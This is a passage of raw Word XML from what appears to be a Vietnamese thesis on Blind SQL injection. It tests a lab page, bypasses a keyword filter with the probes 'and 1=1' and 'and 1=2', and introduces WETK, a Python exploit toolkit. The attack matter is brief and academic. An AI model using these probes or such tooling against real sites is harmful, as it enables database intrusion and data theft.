      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="00313D3F">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00DD5CC1" w:rsidRPr="00313D3F">
        <w:t>Dòng code gây ra lỗi SQL injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w:rsidR="00973F77" w:rsidRPr="00B82BEB" w:rsidRDefault="00075263" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Trang web lỗi đặt tại địa chỉ: </w:t>
      </w:r>
      <w:hyperlink r:id="rId50" w:history="1">
        <w:r w:rsidR="00BA000F" w:rsidRPr="00A56025">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>http://192.168.1.59/vul.php</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00B82BEB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00B82BEB">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập </w:t>
      </w:r>
      <w:r w:rsidR="0097355B">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>với trường hợp nhập và không nhập mức điểm:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797E7B" w:rsidRDefault="00797E7B" w:rsidP="00B3299C">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1050A93C" wp14:editId="01791C45">
            <wp:extent cx="1733702" cy="204781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1735288" cy="2049687"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00797E7B" w:rsidRPr="00313D3F" w:rsidRDefault="00797E7B" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="113" w:name="_Toc459819454"/>
      <w:r w:rsidRPr="00313D3F">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="00313D3F">
        <w:t>: Hiển thị toàn bộ danh sách nếu không có mức điểm</w:t>
      </w:r>
      <w:bookmarkEnd w:id="113"/>
    </w:p>
    <w:p w:rsidR="00B3299C" w:rsidRDefault="00B3299C" w:rsidP="00B3299C">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E3E42C2" wp14:editId="5593CF17">
            <wp:extent cx="1781653" cy="1397203"/>
            <wp:effectExtent l="19050" t="0" r="9047"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1781922" cy="1397414"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B3299C" w:rsidRPr="00B3299C" w:rsidRDefault="00B3299C" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="114" w:name="_Toc459819455"/>
      <w:r w:rsidRPr="00B3299C">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="00B3299C">
        <w:t>: Hiển thị những thí sinh có điểm thi lớn hơn 5</w:t>
      </w:r>
      <w:bookmarkEnd w:id="114"/>
    </w:p>
    <w:p w:rsidR="00FF7B8A" w:rsidRDefault="00FE627D" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Để phòng tránh lỗi SQL injection, lập trình viên đã sử dụng bộ lọc từ khóa,  trong đó có từ</w:t>
      </w:r>
      <w:r w:rsidR="00CD259A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> khóa union, trang web cũng được cấu hình không cho phép hiển thị chi tiết lỗi. Chính vì thế, các phương pháp tấn công sử dụng Error base và Union Base không sử dụng được trong trường hợp này.</w:t>
      </w:r>
      <w:r w:rsidR="00F37E33">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3F37" w:rsidRDefault="005F3F37" w:rsidP="005F3F37">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="227C76B1" wp14:editId="1BE2317B">
            <wp:extent cx="4403750" cy="1773861"/>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407464" cy="1775357"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00521EC1" w:rsidRPr="005F3F37" w:rsidRDefault="005F3F37" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc459819456"/>
      <w:r w:rsidRPr="005F3F37">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="005F3F37">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00521EC1" w:rsidRPr="00521EC1">
        <w:t>Đoạn code lọc từ khóa Union</w:t>
      </w:r>
      <w:r w:rsidR="00090566">
        <w:t>, sleep, bench</w:t>
      </w:r>
      <w:r w:rsidR="00521EC1" w:rsidRPr="00521EC1">
        <w:t>mark….</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w:rsidR="00DD5B0D" w:rsidRDefault="00DD5B0D" w:rsidP="00320504">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Để kiểm tra ứng dụng web mắc lỗi SQL injection hay không, thử nghiệm nhập vào cặp mã tấn công tạo điều kiện True/False</w:t>
      </w:r>
      <w:r w:rsidR="006B1F99">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> vào tham số </w:t>
      </w:r>
      <w:r w:rsidR="004C4D20">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>point</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0016449D" w:rsidRDefault="0016449D" w:rsidP="0016449D">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F90F29B" wp14:editId="06B8039F">
            <wp:extent cx="1977431" cy="1784909"/>
            <wp:effectExtent l="19050" t="0" r="3769"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1980541" cy="1787716"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0016449D" w:rsidRDefault="0016449D" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc459819457"/>
      <w:r w:rsidRPr="0016449D">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="0016449D">
        <w:t>: Trả về toàn bộ danh sách khi điều kiện là True</w:t>
      </w:r>
      <w:r w:rsidR="0007360D">
        <w:t xml:space="preserve"> (and 1=1).</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w:rsidR="0007360D" w:rsidRDefault="0007360D" w:rsidP="0007360D">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C6FA009" wp14:editId="415B58BA">
            <wp:extent cx="3387519" cy="1853638"/>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srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3411563" cy="1866795"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A67F5" w:rsidRPr="0007360D" w:rsidRDefault="0007360D" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc459819458"/>
      <w:r w:rsidRPr="0007360D">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="0007360D">
        <w:t>: Không trả về kết quả khi điều kiện là False</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (and 1=2).</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w:rsidR="00DD5B0D" w:rsidRDefault="00DD5B0D" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kết quả cho thấy ứng dụng web mắc lỗi SQL injection.</w:t>
      </w:r>
      <w:r w:rsidR="00653863">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tuy nhiên ứng dụng đã được cấu hình, cũng như sử dụng phương pháp chặn lọc từ khóa để phòng chống tấn công SQL injection nên không thể sử dụng các phương pháp dạ</w:t>
      </w:r>
      <w:r w:rsidR="00010F89">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ng Error base hay</w:t>
      </w:r>
      <w:r w:rsidR="00653863">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Union Base.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00355955" w:rsidRDefault="00355955" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Để thực hiện mô phỏng tấn công Blind SQL injection, luận văn cần xây dựng các đoạn mã tấn công cho các phương pháp. </w:t>
      </w:r>
      <w:r w:rsidR="005E6ECB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Luận văn sẽ xây dựng các đ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">oạn mã </w:t>
      </w:r>
      <w:r w:rsidR="005E6ECB">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>để</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> triển khai các phương pháp tấn công sau đây:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00355955" w:rsidRPr="00355955" w:rsidRDefault="00355955" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00355955">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tìm kiếm nhị phân</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00355955" w:rsidRPr="00355955" w:rsidRDefault="00355955" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00355955">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phép dịch bit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00355955" w:rsidRPr="00355955" w:rsidRDefault="00355955" w:rsidP="003633C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00355955">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phân tích thứ tự dữ liệu trả về</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00355955" w:rsidRDefault="00355955" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Mã tấn công có thể được xây dựng bằng nhiều ngôn ngữ khác nhau. Trong đó, ngôn ngữ Python là ngôn ngữ phổ biến, thường được sử dụng. đây là một ngôn ngữ đơn giản, dễ học, đặc biệt được cộng đồng hỗ trợ nhiều, cung cấp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>nhiều bộ thư viện dùng sẵn trong lập trình. Lập trình viên do đó sẽ tiết kiệm được nhiều thời gian trong quá trình phát triển mã tấn công.</w:t>
      </w:r>
      <w:r w:rsidR="002F2131">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00355955" w:rsidRDefault="00355955" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Dựa trên các yêu cầu thực tế, trong quá trình hoàn thiện, luận văn đã thực hiện phát triển công cụ</w:t>
      </w:r>
      <w:r w:rsidR="003C6691">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00355955">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>WETK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00355955">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(Web Exploit Toolkit)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Đây là một bộ công cụ được xây dựng bằng ngôn ngữ</w:t>
      </w:r>
      <w:r w:rsidR="002F2131">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python, cho phép quản lý các mã tấ</w:t>
      </w:r>
      <w:r w:rsidR="00586AE9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>n công. Các mã tấn công được xây dựng dưới dạng module, mỗi lần cần thêm mã tấn công chỉ việc tạo một file vào thư mục module của công cụ.</w:t>
      </w:r>
      <w:r w:rsidR="002906A4">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bộ công cụ đóng vai trò như một Framework, cung cấp các chức năng quản lý module, các bộ hàm, thư viện cơ bản, bao gồm cả kiến trúc để tiếp nhận đầu vào từ người dùng, hiển thị kết quả.</w:t>
      </w:r>
      <w:r w:rsidR="00954BB3">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Công cụ cung cấp sự tiện dụng cho lập trình viên, người phát triển mã tấn công, thay vì phải viết tất cả các thành phần: từ nhận đầu vào, hiển thị kết quả thì chỉ tập trung vào việc xây dựng mã khai thác. Ngoài ra, công cụ hỗ trợ quản lý các module, giúp dễ dàng trong việc tìm kiếm, sử dụng, cũng như tái sử dụng mã.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00126AF3" w:rsidRDefault="00126AF3" w:rsidP="00126AF3">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6867C124" wp14:editId="6F697FA8">
            <wp:extent cx="3470300" cy="2956829"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="28" name="Picture 27" descr="WE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K.bmp"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId56"/>
                    <a:srcRect l="7401" t="11785" r="34446" b="18162"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3470300" cy="2956829"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003C6691" w:rsidRPr="00126AF3" w:rsidRDefault="00126AF3" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="118" w:name="_Toc459819459"/>
      <w:r w:rsidRPr="00126AF3">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="00126AF3">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="003C6691" w:rsidRPr="003C6691">
        <w:t xml:space="preserve"> Kiến trúc của WETK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="118"/>
    </w:p>
    <w:p w:rsidR="00DD2BF4" w:rsidRDefault="00D33E86" w:rsidP="00D33E86">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D533A5B" wp14:editId="3CF2854F">
            <wp:extent cx="5225949" cy="2604211"/>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b="1657"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5225949" cy="2604211"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2BF4" w:rsidRPr="00DD2BF4" w:rsidRDefault="00DD2BF4" w:rsidP="00313D3F">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="119" w:name="_Toc459819460"/>
      <w:r w:rsidRPr="00DD2BF4">
        <w:t xml:space="preserve">Hình </w:t>
      </w:r>
      <w:fldSimple w:instr=" STYLEREF 1 \s ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="000512EB">
        <w:t>.</w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Hình \* ARABIC \s 1 ">
        <w:r w:rsidR="005F5912">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidRPr="00DD2BF4">
        <w:t>: Hướng dẫn sử dụng WETK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="119"/>
    </w:p>
    <w:p w:rsidR="00586AE9" w:rsidRDefault="00586AE9" w:rsidP="003633C3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Đây là một một công cụ mã nguồn mở,</w:t>
      </w:r>
      <w:r w:rsidR="00E7608A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> đang trong quá trình phát triển.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E7608A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">ã nguồn của công cụ được chia sẻ trên mạng Internet tại địa chỉ: </w:t>
      </w:r>
      <w:hyperlink r:id="rId58" w:history="1">
        <w:r w:rsidRPr="00394160">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
          </w:rPr>
          <w:t>https://github.com/kendyhikaru/WETK/tree/master/WETK0.2</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00E7608A">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> để mọi người cùng phát triển.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2BF4" w:rsidRDefault="002E37B1" w:rsidP="00DD2BF4">
      <w:pPr>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
